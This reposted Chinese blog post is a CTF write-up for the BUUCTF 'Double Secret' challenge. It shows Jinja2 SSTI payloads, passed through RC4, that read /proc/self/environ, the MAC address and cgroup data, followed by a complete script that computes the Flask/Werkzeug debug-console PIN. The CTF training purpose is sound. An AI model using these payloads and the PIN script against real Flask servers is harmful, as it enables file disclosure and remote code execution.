投稿
  1. 首页
  2. java

【BUUCTF】[CISCN2019 华东南赛区]Double Secret

code 2022-4-27 java 阅读 57

【BUUCTF】[CISCN2019 华东南赛区]Double Secret,第1张


尝试/secret

?secret=1

输入长一点

发现出现了报错,这个页面是flask应用开启了debug模式后运行出错的表现,在较老版本的flask中可以直接在这个页面中打开python控制台运行代码,而在较新版本的flask中要打开python控制台需要输入一个pin码
仔细观察报错,不难发现一处引人注目,单独拎出来审计代码

 if(secret==None):
        return 'Tell me your secret.I will encrypt it so others can\'t see'
    rc=rc4_Modified.RC4("HereIsTreasure")   #解密
    deS=rc.do_crypt(secret)
 
    a=render_template_string(safe(deS))
 
    if 'ciscn' in a.lower():
        return 'flag detected!'
    return a

可以肯定的是这里对secret使用了RC4加密,密钥为HereIsTreasure。还使用了模板渲染,可能存在ssti
RC4是一种对称加密算法,那么对密文进行再次加密就可以得到原来的明文,为了验证可以secret=d,看看结果如是否是对1
接下来利用render_template_string(),我们构造明文{{config}}对应的密文,该密文再次加密即为{{config}}


到这里接下来就是进行pin的获取,关于这一点,我进行了一次本地实验Flask Debug模式下的pin安全问题
这个题目环境略有不同,因为是Linux的pyhton2.7环境,但是思路是一致的。这里直接写wp

1.读username

 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/proc/self/environ').read()}}

2.读mac地址

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/sys/class/net/eth0/address').read()}}

3.读machine-id(这里比较特殊,我自己Linux的Python2.7测试不是这样的,可能和flask版本或者题目开docker容器的缘故)

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/proc/self/cgroup').read()}}

其他的数据

1 modname:‘flask.app’,
2.getattr(app, ‘name’, getattr(app.class, ‘name’)):“Flask”
3.getattr(mod, ‘file’, None): ‘/usr/local/lib/python2.7/site-packages/flask/app.pyc’

最终脚本

import hashlib
from itertools import chain
probably_public_bits = [
    'glzjin'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python2.7/site-packages/flask/app.pyc' # getattr(mod, '__file__', None),
]

private_bits = [
    '55680803709678',# str(uuid.getnode())
    '5568c325b4a26f17b2ccd62e599b62dec881f70c76d4ddb3f68c24a98398d26d'# get_machine_id()
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/733267.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
code code 管理员组
0 0
上一篇 2022-04-27
下一篇 2022-04-27

发表评论

登录后才能评论

评论列表(0条)

保存